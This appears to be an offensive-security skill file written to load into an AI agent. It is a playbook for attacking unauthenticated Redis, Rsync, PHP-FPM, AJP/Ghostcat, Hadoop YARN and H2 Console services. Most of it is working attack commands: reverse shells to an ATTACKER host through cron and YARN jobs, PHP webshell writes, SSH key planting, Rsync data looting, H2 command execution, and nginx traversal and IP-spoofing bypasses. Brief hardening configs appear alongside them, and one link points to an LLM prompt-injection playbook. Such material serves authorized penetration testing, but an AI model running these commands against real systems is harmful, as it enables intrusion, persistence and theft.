Menu
Unauthorized access playbook for common exposed services. Use when Redis, Rsync, PHP-FPM, AJP/Ghostcat, Hadoop YARN, H2 Console, or similar management interfaces are exposed without authentication.
| name | unauthorized-access-common-services |
| description | Unauthorized access playbook for common exposed services. Use when Redis, Rsync, PHP-FPM, AJP/Ghostcat, Hadoop YARN, H2 Console, or similar management interfaces are exposed without authentication. |
AI LOAD INSTRUCTION: Expert techniques for exploiting unauthenticated or weakly authenticated management services. Covers Redis write-to-RCE, Rsync data theft, PHP-FPM code execution, Ghostcat AJP file read, Hadoop YARN job submission, and H2 Console JNDI. These are infrastructure-level findings distinct from web application vulnerabilities.
Also load PORT_SERVICE_MATRIX.md when you need:
nmap -sV -p 6379,873,9000,8009,8088,8082,1099,9200,5984,2375,27017,11211 TARGET
# Key ports:
# 6379 — Redis
# 873 — Rsync
# 9000 — PHP-FPM (FastCGI)
# 8009 — AJP (Tomcat Ghostcat)
# 8088 — Hadoop YARN ResourceManager
# 8082 — H2 Console (or embedded in Spring Boot)
# 1099 — Java RMI Registry
# 9200 — Elasticsearch
# 5984 — CouchDB
# 2375 — Docker API
# 27017 — MongoDB
# 11211 — Memcached
redis-cli -h TARGET ping
# Response: PONG = unauthenticated access confirmed
redis-cli -h TARGET INFO server
# Returns Redis version, OS, config
# Generate key pair:
ssh-keygen -t rsa -f redis_rsa
# Write public key to Redis, then dump to authorized_keys:
cat redis_rsa.pub | redis-cli -h TARGET -x set ssh_key
redis-cli -h TARGET config set dir /root/.ssh
redis-cli -h TARGET config set dbfilename authorized_keys
redis-cli -h TARGET save
# Connect:
ssh -i redis_rsa root@TARGET
redis-cli -h TARGET
> set x "\n\n*/1 * * * * bash -i >& /dev/tcp/ATTACKER/4444 0>&1\n\n"
> config set dir /var/spool/cron/
> config set dbfilename root
> save
redis-cli -h TARGET
> set webshell "<?php system($_GET['cmd']); ?>"
> config set dir /var/www/html/
> config set dbfilename shell.php
> save
# Access: http://TARGET/shell.php?cmd=id
Use redis-rogue-server to exploit master-slave replication for loading malicious .so module:
python3 redis-rogue-server.py --rhost TARGET --lhost ATTACKER
# Loads module via SLAVEOF → MODULE LOAD → system.exec
requirepass STRONG_PASSWORD
bind 127.0.0.1
protected-mode yes
rename-command CONFIG ""
rename-command FLUSHALL ""
rsync TARGET::
# Lists available modules (shares) if anonymous access allowed
rsync -av TARGET::MODULE_NAME /tmp/loot/
# Download entire module contents
# Create reverse shell cron:
echo '*/1 * * * * bash -i >& /dev/tcp/ATTACKER/4444 0>&1' > /tmp/evil_cron
# Upload to target's crontab (if writable module maps to /etc/ or similar):
rsync -av /tmp/evil_cron TARGET::MODULE/cron.d/backdoor
# /etc/rsyncd.conf:
auth users = rsync_user
secrets file = /etc/rsyncd.secrets
list = no
hosts allow = 10.0.0.0/8
read only = yes
PHP-FPM listens for FastCGI requests. If exposed to the network (instead of Unix socket), an attacker can send crafted FastCGI packets to execute arbitrary PHP code.
# Using fcgi_exp or similar tool:
python3 fpm.py TARGET 9000 /var/www/html/index.php -c "<?php system('id'); ?>"
# Key parameters in FastCGI request:
# SCRIPT_FILENAME = path to any existing .php file
# PHP_VALUE = "auto_prepend_file = php://input" (injects POST body as PHP code)
# PHP_ADMIN_VALUE = "allow_url_include = On"
SCRIPT_FILENAME = /var/www/html/index.php # must point to an existing .php file
PHP_VALUE = auto_prepend_file = php://input # injects POST body as PHP code
PHP_ADMIN_VALUE = allow_url_include = On # enables remote inclusion
gopher://TARGET:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00...
# Encoded FastCGI packet
# Tool: Gopherus generates the gopher:// URL
python3 gopherus.py --exploit fastcgi
; php-fpm.conf — bind to socket only:
listen = /var/run/php-fpm.sock
; If TCP required, restrict:
listen.allowed_clients = 127.0.0.1
Apache JServ Protocol (AJP) is used between reverse proxy and Tomcat. AJP trusts all incoming data — an attacker connecting directly can set javax.servlet.include.request_uri to read arbitrary files from the webapp directory.
# Using ajpShooter or similar:
python3 ajpShooter.py TARGET 8009 /WEB-INF/web.xml read
# Reads any file within the webapp root:
# /WEB-INF/web.xml — deployment descriptor
# /WEB-INF/classes/*.class — compiled Java classes
# /WEB-INF/lib/*.jar — library JARs
If a file upload exists (e.g., uploaded JSP disguised as image), AJP can include it as JSP:
python3 ajpShooter.py TARGET 8009 /uploaded_avatar.txt eval
# If the file contains JSP code, it gets executed
<!-- server.xml — disable AJP or add secret: -->
<Connector port="8009" protocol="AJP/1.3" secretRequired="true" secret="STRONG_SECRET"/>
<!-- Or remove the AJP connector entirely -->
curl http://TARGET:8088/cluster
# If accessible → unauthenticated YARN ResourceManager UI
# Submit a MapReduce application that executes a command:
curl -s -X POST http://TARGET:8088/ws/v1/cluster/apps/new-application
# Returns: {"application-id":"application_xxx_0001"}
curl -s -X POST http://TARGET:8088/ws/v1/cluster/apps \
-H "Content-Type: application/json" \
-d '{
"application-id": "application_xxx_0001",
"application-name": "test",
"am-container-spec": {
"commands": {"command": "/bin/bash -i >& /dev/tcp/ATTACKER/4444 0>&1"}
},
"application-type": "YARN"
}'
Enable Kerberos authentication; restrict network access to management ports.
H2 Console is often enabled in Spring Boot apps via:
spring.h2.console.enabled=true
spring.h2.console.settings.web-allow-others=true
Access: http://TARGET:PORT/h2-console
In the H2 Console login form, the JDBC URL field accepts JNDI.
BeanFactory + EL bypass (works on Java 8u252+):
# JDBC URL in login form:
javax.naming.InitialContext
# LDAP response attributes:
javaClassName: javax.el.ELProcessor
javaFactory: org.apache.naming.factory.BeanFactory
forceString: x=eval
x: Runtime.getRuntime().exec("id")
Also see jndi-injection for the full JNDI/BeanFactory exploitation flow.
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException { Runtime.getRuntime().exec(cmd); return "ok"; }';
CALL EXEC('id');
# Redis — check auth:
redis-cli -h TARGET ping
# Redis — write webshell:
SET x "<?php system($_GET['c']);?>"
CONFIG SET dir /var/www/html/
CONFIG SET dbfilename shell.php
SAVE
# Rsync — list modules:
rsync TARGET::
# Ghostcat — read web.xml:
python3 ajpShooter.py TARGET 8009 /WEB-INF/web.xml read
# YARN — submit RCE job:
curl -X POST http://TARGET:8088/ws/v1/cluster/apps/new-application
# H2 — RCE via alias:
CREATE ALIAS EXEC AS '...Runtime.exec...'; CALL EXEC('id');
# Vulnerable configuration:
location /static {
alias /var/www/static/;
}
# Access: /static../etc/passwd → resolves to /var/www/etc/passwd
# The missing trailing slash on location causes path traversal
# Fix: location /static/ (with trailing slash matching alias)
# If no root location defined and alias is used:
# Attacker may access nginx.conf or other server files
GET /..%2f..%2fetc/nginx/nginx.conf HTTP/1.1
# If backend trusts these headers for IP-based auth:
GET /admin HTTP/1.1
X-Forwarded-For: 127.0.0.1
X-Real-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
# May bypass IP whitelist for admin panels
# Caddy with templates enabled:
# If user input reaches Caddy template rendering:
{{.Req.Host}} → Information disclosure
{{readFile "/etc/passwd"}} → Local file read via Go template
# This is essentially a Go template injection through proxy config
yandex/gixy — Nginx configuration analyzerRaelize/Kyubi — Reverse proxy misconfiguration scannerGerbenJavado/bypass-url-parser — URL parser confusion testerBusiness logic vulnerability playbook. Use when reasoning about workflows, race conditions, price manipulation, coupon abuse, state machines, and multi-step authorization gaps.
LLM prompt injection playbook. Use when testing AI/LLM applications for direct injection, indirect injection via RAG/browsing, tool abuse, data exfiltration, MCP security risks, and defense bypass techniques.
Reconnaissance and methodology playbook. Use when mapping assets, discovering endpoints, fingerprinting technology, and building a structured testing plan for a new target.
SQL injection playbook. Use when input reaches SQL queries, authentication logic, sorting, filtering, reporting, or DB-specific blind and out-of-band execution paths.
SSRF playbook. Use when the server fetches URLs, resolves hostnames, imports remote content, or can be driven toward internal networks, cloud metadata, or secondary protocols.
CRLF injection playbook. Use when user input reaches HTTP response headers, Location redirects, Set-Cookie values, or log files where carriage-return/line-feed characters can split or inject content.